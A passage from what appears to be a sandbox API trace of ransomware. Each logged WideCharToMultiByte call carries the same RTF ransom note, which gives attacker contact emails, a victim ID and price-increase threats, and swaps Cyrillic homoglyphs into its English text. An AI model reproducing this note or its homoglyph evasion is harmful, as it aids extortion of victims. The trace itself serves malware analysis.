g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w 